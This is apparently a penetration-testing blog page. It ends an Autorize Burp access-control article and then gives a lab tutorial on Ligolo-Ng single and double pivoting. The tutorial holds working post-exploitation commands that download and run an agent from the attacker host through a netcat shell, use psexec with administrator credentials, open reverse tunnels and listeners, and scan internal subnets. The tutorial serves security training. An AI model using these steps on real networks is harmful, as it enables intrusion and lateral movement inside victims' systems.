Green [Enforced!] : endpoint is clearly protected against access control/IDOR issues.

 


As visible in above image, request 1, 2, 6, and 7 are having Broken access control issue.

Keep in mind that do not blindly follow the Autorize result,  The Red highlight requests do not mean that all endpoints are vulnerable or bypassed. There may be false positives; You must do a cross-check.

Some other possible scenarios, Suppose you are testing auth issues with the two same level of users. As a result, you will see Authz. Status shows Bypassed! And Unauth. Status shows Enforced! In that case improper authorization can be found on the request which shows that the specific endpoint can be accessed by the 2nd user but has correctly implemented authorization for any unauthorized users.

When you select any highlighted request, on the right side you will see the detailed information about modified, original & unauthenticated request and responses.



That's a wrap for now. Cheers!

Conclusion

For carrying out comprehensive security reviews, the "Autorize Burp" extension is an essential tool. By automating authentication and enabling the testing of restricted areas, it enhances the efficiency and effectiveness of security assessments. This extension is an indispensable tool for conducting comprehensive tests and identifying potential vulnerabilities that may only be accessible to authenticated users.

A Detailed Guide on Ligolo-Ng

0
0

This comprehensive guide delves into the intricacies of Lateral Movement utilizing Ligolo-Ng, a tool developed by Nicolas Chatelain. The Ligolo-Ng tool facilitates the establishment of tunnels through reverse TCP/TLS connections using a tun interface, avoiding the necessity of SOCKS. This guide covers various aspects, from the tool's unique features to practical applications such as single and double pivoting within a network.

Download Ligolo-Ng:

Ligolo-Ng can be downloaded from the official repository: Ligolo-Ng Releases.

Table of Contents:

1.       Introduction to Ligolo-Ng

2.       Ligolo V/S Chisel

3.       Lab Setup

4.       Prerequisites

5.       Setting up Ligolo-Ng

6.       Single Pivoting

7.       Double Pivoting

Ligolo-Ng Overview:

Ligolo-Ng is a lightweight and efficient tool designed to enable penetration testers to establish tunnels through reverse TCP/TLS connections, employing a tun interface. Noteworthy features include its GO-coded nature, VPN-like behavior, customizable proxy, and agents in GO. The tool supports multiple protocols, including ICMP, UDP, SYN stealth scans, OS detection, and DNS Resolution, offering connection speeds of up to 100 Mbits/sec. Ligolo-Ng minimizes maintenance time by avoiding tool residue on disk or in memory.

Ligolo V/S Chisel:

  • Ligolo-Ng outperforms Chisel in terms of speed and customization options.

  • Chisel operates on a server-client model, while Ligolo-Ng establishes individual connections with each target.

  • Ligolo-Ng reduces maintenance time by avoiding tool residue on disk or in memory.

  • Ligolo-Ng supports various protocols, including ICMP, UDP, SYN, in contrast to Chisel, which operates primarily on HTTP using a websocket.

 

 

Lab Setup

Follow the step-by-step guide for lateral movement within a network, covering both single and double pivoting techniques.

 


Prerequisites

Obtain the Ligolo 'agent' file for Windows 64-bit and the 'proxy' file for Linux 64-bit.

Install the 'agent' file on the target machine and the 'proxy' file on the attacking machine (Kali Linux).



Setting up Ligolo-Ng

Step1: Following the acquisition of both the agent and proxy files, the next step involves the setup of Ligolo-Ng. To ascertain the current status of Ligolo-Ng configuration, the 'ifconfig' command is employed. To initiate activation, execute the prescribed sequence of commands as follows:

 

ip tuntap add user root mode tun ligolo

ip link set ligolo up

Verify Ligolo-Ng activation with: ‘ifconfig’ command



Step2: Unzip the Ligolo proxy file:

tar -xvzf ligolo-ng_proxy_0.5.1_linux_amd64.tar.gz

This proxy file facilitates the establishment of a connection through Ligolo, enabling us to execute subsequent pivoting actions. To explore the full range of options available in the proxy file, utilize the 'help' command

./proxy -h



Step 3: The options displayed in the preceding image are designed for incorporating various types of certificates with the proxy. The chosen approach involves utilizing the '-selfcert' option, which operates on port 11601. Execute the provided command, as illustrated in the accompanying image below:

./proxy -selfcert



Step 4: By executing the aforementioned command, Ligolo-Ng becomes operational on the attacking machine. Subsequently, to install the Ligolo agent on the target machine, unzip the ligolo agent file using the command:

unzip ligolo-ng_agent_0.5.1_windows_amd64.zip

To facilitate the transmission of this agent file to the target, establish a server with the command:

updog -p 80



Step 5: In the context of lateral movement, a session has been successfully acquired through netcat. Utilizing the established netcat connection, the next step involves downloading the Ligolo agent file onto the target system. Referencing the image below, execute the provided sequence of commands:

cd Desktop

powershell wget 192.168.1.5/agent.exe -o agent.exe

dir



Step 6: Evidently, the agent file has been successfully downloaded. Given that the proxy file is presently operational on Kali, the subsequent action involves executing the agent file.

./agent.exe -connect 192.168.1.5:11601 -ignore-cert



Upon executing the specified command, a Ligolo session is initiated. Subsequently, employ the 'session' command, opting for '1' to access the active session. Following the session establishment, execute the 'ifconfig' command as illustrated in the provided image.

Notably, it discloses the existence of an internal network on the server, denoted by the IPv4 Address 192.168.148.130/24. This discovery prompts further exploration into creating a tunnel through this internal network in the subsequent steps.



Single Pivoting

In the single pivoting scenario, the aim is to access Network B while staying within the boundaries of Network

 A.


 

Attempting a direct ping to Network B reveals, as illustrated in the image below, the impossibility due to different network configuration.



To progress towards the single pivoting objective, a new terminal window will be opened. Subsequently, the internal IP will be added to the IP route, and the addition will be confirmed, as illustrated in the image below, utilizing the following commands:

ip route add 192.168.148.0/24 dev ligolo

ip route list



Return to the Ligolo proxy session window and initiate the tunneling process by entering the 'start' command, as demonstrated in the provided image.

 


Upon establishing a tunnel into network B, we executed the netexec command to scan the network B subnet, unveiling an additional Windows 10 entity distinct from DC1, as depicted in the image.



Upon attempting to ping the IP now, successful ping responses will be observed, a contrast to the previous unsuccessful attempts. Additionally, a comprehensive nmap scan can be conducted, as illustrated in the image below.



Double Pivoting

 

In the process of double pivoting, our objective is to gain access to Network C from Network A, utilizing Network B as an intermediary.

 


 

From the newly opened terminal window, utilize the Impacket tool to access the identified Windows 10 with the IP 192.168.148.132. Following this, execute the subsequent set of commands to download the Ligolo agent onto Windows 10

Impacket-psexec administrator:123@192.168.148.132

cd c:\users\public

powershell wget 192.168.1.5/agent.exe -o agent.exe

dir



Subsequently, initiate the execution of the agent.exe. Upon completion, a session will be established, given that our Ligolo proxy file is already operational.

agent.exe -connect 192.168.1.5:11601 -ignore-cert

 


Examine Ligo-ng proxy server, a new session, corresponding to Windows 10, will be present, as indicated in the accompanying image. Execute the 'start' command to initiate additional tunneling.

 


Execute the 'session' command to display the list of sessions. Navigate through the sessions using arrow keys, selecting the desired session for access. In this instance, the aim is to access the latest session, identified as session 2. Select this session and utilize the 'ifconfig' command to inspect the interfaces. This action reveals an additional network C interface with the address 192.168.159.130/24, mirroring the details depicted in the image below.

 


Upon identifying the new network, the initial step involves attempting a ping. However, the image below indicates an absence of connectivity between Kali and the network C.



Add the Network C Subnet in the IP route list with the following command.

ip route add 192.168.159.0/24 dev ligolo

ip route list

 


 

With the modification of our IP route, the next step involves the addition of a listener to traverse the intra-network and retrieve the session. To incorporate the listener, utilize the following command:

listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4444



The image above confirms the activation of the listener. To initiate tunneling, refer to available options using the help command. It becomes evident that halting the ongoing tunneling in session 1 is necessary before starting the process in session 2. This step-by-step approach facilitates the transfer of data to the listener, which subsequently retrieves the necessary information. This operational technique, known as double pivoting, involves stopping the initial tunneling in the first session using the 'stop' command. In second session, execute the 'start' command, following the steps illustrated in the image below.

 


Executing double pivoting was successful, and its verification occurred through the utilization of crackmapexec with the command:

crackmapexec smb 192.168.159.0/24

Discovering Metasploitable2 within the network followed. This led to the ability to conduct a ping and nmap scan, leveraging the acquired network access, as illustrated in the image below:

 


 

 

 





Latest Images